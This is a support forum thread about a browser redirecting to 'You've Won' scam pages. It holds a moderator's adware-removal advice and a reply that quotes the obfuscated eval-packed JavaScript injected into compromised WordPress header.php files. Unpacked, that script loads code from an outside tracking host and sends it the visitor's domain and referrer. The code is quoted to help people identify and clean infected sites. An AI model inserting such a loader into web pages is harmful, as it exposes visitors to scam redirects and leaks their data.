Tap here to go to the mobile version of the site.
Your Firefox is out of date and may contain a security risk! Upgrade Firefox

Support Forum

Periodiacally, I am quickly & unexpectedly rediected to a screen that says, "Congratulations, You've Won......"


I frequently am redirected to a new screen that says, "Congratulations, You've Won ......" It is from Testables.net, which I looked up and it is somehow related to Firefox. I deleted my Firefox, which was my primary browser, and have not had an incident like I mentiones above since. I am back to IE. I like Firefox, but will not reinstall it until I can find out how to get rid of testables.net

Additional System Details

This happened

Every time Firefox opened

This started when...

About a month ago


  • User Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; BOIE9;ENUS)

More Information

I checked their "Privacy Policy" and the name of the site is not even mentioned. I checked Google and found several sites about it, but no really helpful info.

  • Top 10 Contributor
  • Moderator
2043 solutions 8891 answers

hello, this sounds like a problem possibly caused by adware on your pc. please go to firefox > addons > extensions & remove any suspicious entries (toolbars, things that you have not installed intentionally, etc). also go to the windows control panel / programs and remove all toolbars or potentially unwanted software from there and do a full scan of your system with the security software that you have in place and/or a different tool like the free version of malwarebytes.

Remove a toolbar that has taken over your Firefox search or home page Troubleshoot Firefox issues caused by malware

chrisn45 0 solutions 1 answers

I don't now if you have resolved this testables.net issue but I had it recently.

It attacked about 5 of my sites - mostly Wordpress. This malware is browser independent so not specific to Firefox. This is the exact script that causes it - You can find it usually Just before the close </head> tag in your header.php file.

<script type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('0.f(\'<2\'+\'3 5="6/7" 8="9://a.b/e/o/g?d=\'+0.h+\'&i=\'+j(0.k)+\'&c=\'+4.l((4.m()*n)+1)+\'"></2\'+\'3>\');',25,25,'document||scr|ipt|Math|type|text|javascript|src|http|themenest|net|||platform|write|track|domain|r|encodeURIComponent|referrer|floor|random|1000|script'.split('|'),0,{}));</script>

For Wordpress users download the "Antivirus" Plugin its quite good at sniffing out this particular malware code.

I hope this helps!

Modified by cor-el